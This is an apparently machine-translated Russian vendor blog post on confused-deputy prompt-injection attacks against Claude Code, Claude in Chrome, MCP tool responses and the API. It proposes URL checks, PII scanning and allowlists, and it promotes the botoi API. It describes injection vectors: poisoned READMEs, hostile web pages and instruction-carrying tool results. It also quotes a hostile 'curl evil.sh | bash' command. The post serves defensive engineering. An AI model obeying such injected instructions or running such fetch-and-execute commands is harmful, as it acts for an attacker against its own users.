Матрица аудита Клода смущенного депутата: 4 слепых пятна, 3 препятствия
Четыре исследовательские группы опубликовали результаты оперативного внедрения Клода в период с 6 по 7 мая 2026 года. Матрицу аудита, сопоставляющую каждое слепое пятно с конкретным ограждением (проверка URL-адресов, сканирование PII, список разрешений оболочки), вы можете отправить на этой неделе.
В период с 6 по 7 мая 2026 года четыре отдельные исследовательские группы опубликовали выводы о Клоде Промпте. инъекция. Большинство репортажей рассматривали их как три разные истории. Это одна и та же история: запутанная задача депутата, когда Клод выполняет действия от имени злоумышленника, который контролирует ненадежный контент в его контекстном окне.
README в клонированном репозитории может запускать команды оболочки через Claude Code. Веб-страница в Клоде в Chrome может убедить агента получить URL-адреса злоумышленника. Ответ инструмента MCP может вводить инструкции. что следующий вызов инструмента подчиняется. Модель делает то, что ей сказали; проблема в модели не могу сказать, кто говорит.
Частичная защита антропных кораблей (запросы разрешений в Клод-коде, подтверждения действий в Клод в Chrome). Остальное ваше. Вот матрица аудита, которая сопоставляет каждое слепое пятно с бетонное ограждение и проверку API одним вызовом, которую вы можете добавить в свой шлюз MCP сегодня.
Четыре слепых пятна
| Поверхность | Вектор атаки | Что работает | Родное ограждение |
|---|---|---|---|
| Клод Код | Отравленный README, пакет postinstallили git commit body |
Команда оболочки, запись файла, git push | Запрос разрешения |
| Клод в Chrome | Инструкции веб-страницы, замаскированные под запросы пользователей | Нажмите, отправьте форму, перейдите по ссылке. | Подтверждение действия |
| Клод Рабочий стол + MCP | Ответ инструмента содержит инструкции для следующего вызова. | Связанный вызов инструмента MCP, чтение файла, выборка по сети | Диалоговое окно согласия инструмента |
API tool_use |
Ненадежная строка внутри блока результатов инструмента | Что бы ни решил следующий ход | Нет по умолчанию |
Каждое встроенное ограждение улавливает очевидный случай (команду оболочки, которую пользователь не запрашивал) и упускает тонкий момент («безобидный» завиток для похожего хоста, которого пользователь никогда не видел). Исправление это глубокоэшелонированная защита на уровне инструментов, а не на уровне подсказок.
Guardrail 1: проверять на фишинг каждый URL-адрес, к которому прикасается агент.
Самый распространенный способ эскалации в замешательстве — «посетите этот URL-адрес и скажите мне, что там написано». URL принадлежит злоумышленнику. Данные, которые агент читает дальше, теперь являются его входными данными. Запустить фишинг проверьте каждый URL-адрес, который агент не видел в исходном приглашении пользователя:
Необработанный исполняемый файл, размещенный на анонимной основе без закрепленного коммита, является классикой.
цепочка «быстрое внедрение — выполнение оболочки». Вердикт возвращается менее чем через 100 мс; вы кэшируете
Хэш URL за 10 минут; вы отбрасываете вызовы инструментов, вердикт которых отличается от
clean.
Guardrail 2: PII и секретное сканирование каждого ответа инструмента MCP
Вторая эскалация — отравление реакции инструмента. Инструмент MCP возвращает большой двоичный объект JSON размером 4 КБ; где-то в этом BLOB-объекте находится строка инструкций. Клод читает весь объект, и инструкция побеждает. Большой двоичный объект также может привести к утечке учетных данных, собранных где-то еще, которые затем попадают в рассуждения модели. трассировка и журналы ваших разговоров.
Заблокируйте ответ инструмента от достижения модели, если он содержит действующие учетные данные. Редактировать электронные письма и телефоны, если пользователь не попросил их. Считайте каждый сервер MCP ненадежным по умолчанию; ты не знаю, кто отравил восходящий источник данных.
Guardrail 3: жесткие списки хостов и оболочки на шлюзе
Третья эскалация — это та, которая кусает предприятия: агент, который незаметно расширяет свою собственную
достичь. README убеждает Клода Кода запуститься curl evil.sh | bash «для настройки». А
веб-страница убеждает Клода в Chrome отправить форму в похожем домене. Обе атаки умирают
против фиксированного белого списка:
Белый список — это скучно. Суть в том, что это скучно. Любое действие, выходящее за пределы белого списка, либо происходит немедленный сбой или выдается приглашение, которое пользователь должен прочитать. Агент остается полезным внутри песочница и безобидна за ее пределами.
60-линейный шлюз MCP, соединяющий все вместе
Все три ограждения находятся в одной функции промежуточного программного обеспечения, которая находится между Клодом и каждым MCP. сервер. Он извлекает URL-адреса из ответов инструмента, проверяет их на соответствие набору доверенных хостов, а также список разрешенных сеансов, запускает сканирование PII и возвращает решение о структурированном блокировании ведущему приложению. может появиться пользователю:
Набор доверенных хостов содержит ваши собственные API. Список разрешенных сеансов начинается пустым и увеличивается по мере пользователь явно утверждает хосты во время сеанса. Кэширование делает чек фактически бесплатным для повторяющиеся URL-адреса (подумайте о нумерации страниц, повторных попытках, одной и той же странице документации при вызове инструмента).
Если вы еще не можете запустить шлюз, используйте дешевый вариант: регистрируйте каждый URL-адрес и каждую команду оболочки. агент делает предложение в структурированное хранилище и предупреждает обо всем, что попадает на хост, которого вы не сделали. предварительно авторизовать. Обнаружение без предотвращения не сравнится ни с тем, ни с другим.
Где это вписывается в позицию глубокоэшелонированной защиты
Матрица аудита не является заменой собственной работы Anthropic. Это слой, которым вы управляете. А разумное разделение:
- Anthropic владеет моделью: надежность быстрого внедрения, иерархия инструкций обучение, отказное поведение.
- Вы владеете поверхностью инструмента: Проверка URL-адреса, очистка PII, хост и оболочка списки разрешенных, инвентарь сервера MCP.
- Ваш IdP владеет удостоверением: кратковременные токены для агента, за сеанс аудит, отдельные учетные данные от пользователя-человека.
Пропустите любой уровень, и следующий отчет о замешательстве депутата будет включать в себя ваш инцидент. Исследование 6-7 мая — это бесплатный предварительный просмотр того, что должна выпустить каждая команда, прежде чем это станет ежеквартальным циклом новостей.
Ключевые выводы
- Четыре слепых пятна, одна основная причина. Клод рассматривает каждый токен как потенциально несущий инструкции. Ненадежный контент в контексте — это вектор действия, а не пассивное чтение.
- Проверка фишинга URL-адресов для каждого URL-адреса, предложенного инструментом. Один вызов API, 100 мс, кэшируется. Отменяет наиболее распространенную цепочку эскалации быстрого внедрения.
- Сканирование PII при каждом ответе инструмента MCP. Блокирует утечку учетных данных через инструмент отравляет результаты и сохраняет секреты в журналах разговоров.
- Жесткие списки разрешенных на шлюзе. Команда оболочки и списки разрешенных хостов убивают «тихо расширить охват» эскалации. Скучно, ограниченно, эффективно.
- Раскол в глубокоэшелонированной защите. Anthropic владеет моделью, вы владеете поверхностью инструмента. ваш IdP владеет личностью. Пропустите слой, и следующая исследовательская капля назовет вас.
Ботойские экспонаты /v1/phishing/check, /v1/pii/detect,
/v1/url-metadataи еще примерно 200 одноцелевых конечных точек за одним ключом API.
при 5 запросах/мин бесплатно. Подключите их к шлюзу MCP или позвоните им из самого Claude Code через
тот ботои MCP сервер.
Просмотрите
интерактивные документы
начать.
FAQ
- В чем проблема Клода с запутавшимся депутатом?
- Атака с замешательством заместителя происходит, когда привилегированный процесс (Claude Code, Claude в Chrome) выполняет действия от имени злоумышленника, который контролирует часть его ввода. В период с 6 по 7 мая 2026 года четыре исследовательские группы опубликовали результаты, показывающие, что Клода можно обманом заставить выполнить команды оболочки, украсть данные или посетить URL-адреса злоумышленника, когда ненадежный контент (README, веб-страница, ответ инструмента MCP) содержит инструкции, похожие на запросы пользователя.
- Какие поверхности Клода затронуты?
- Код Claude (агент CLI, читающий файлы репозитория), Claude в Chrome (агент просмотра веб-страниц, читающий веб-страницы), Claude Desktop с серверами MCP (ответы инструментов могут содержать инструкции) и API, когда результаты Tool_use содержат строки, контролируемые злоумышленником. Корень проблемы один и тот же во всех четырех: Клод рассматривает каждый токен в контексте как потенциально несущий инструкции.
- Предоставляет ли Anthropic ограждения для этого?
- Да, частично. В Claude Code есть система разрешений на запись в оболочку и файлы. У Клода в Chrome есть слой подтверждения действий. Ничто не мешает решительному злоумышленнику совместить быструю инъекцию с социальной инженерией. Уровень глубокоэшелонированной защиты — ваш: проверяйте каждый URL-адрес, предлагаемый агентом, сканируйте каждый ответ инструмента на предмет IOC и ограничивайте радиус взрыва на шлюзе API.
- Чем это отличается от обычной быстрой инъекции?
- Классическое внедрение подсказки заканчивается при выводе текста. Сбитый с толку депутат заканчивает действовать: выполняется команда оболочки, извлекается URL-адрес, срабатывает вебхук, деньги перемещаются. Исправление должно действовать там, где происходят действия (слой инструмента), а не там, где генерируется текст (модель). Вот почему защитные прокси-серверы и проверка URL-адресов имеют большее значение, чем быстрое усиление защиты.
- Какой минимум мне следует добавить на этой неделе?
- Три вещи. Проверка URL-адреса на фишинг перед тем, как агент получит или свяжет любой домен, который он не видел в приглашении пользователя. PII и секретное сканирование каждого ответа инструмента MCP, прежде чем он попадет в контекст Клода. И жесткий список разрешенных команд оболочки или HTTP-хостов на уровне шлюза. Каждый из них представляет собой один вызов API и один блок конфигурации.
Начните разработку с botoi
150+ API-эндпоинтов для поиска, обработки текста, генерации изображений и утилит для разработчиков. Бесплатный тариф, без банковской карты.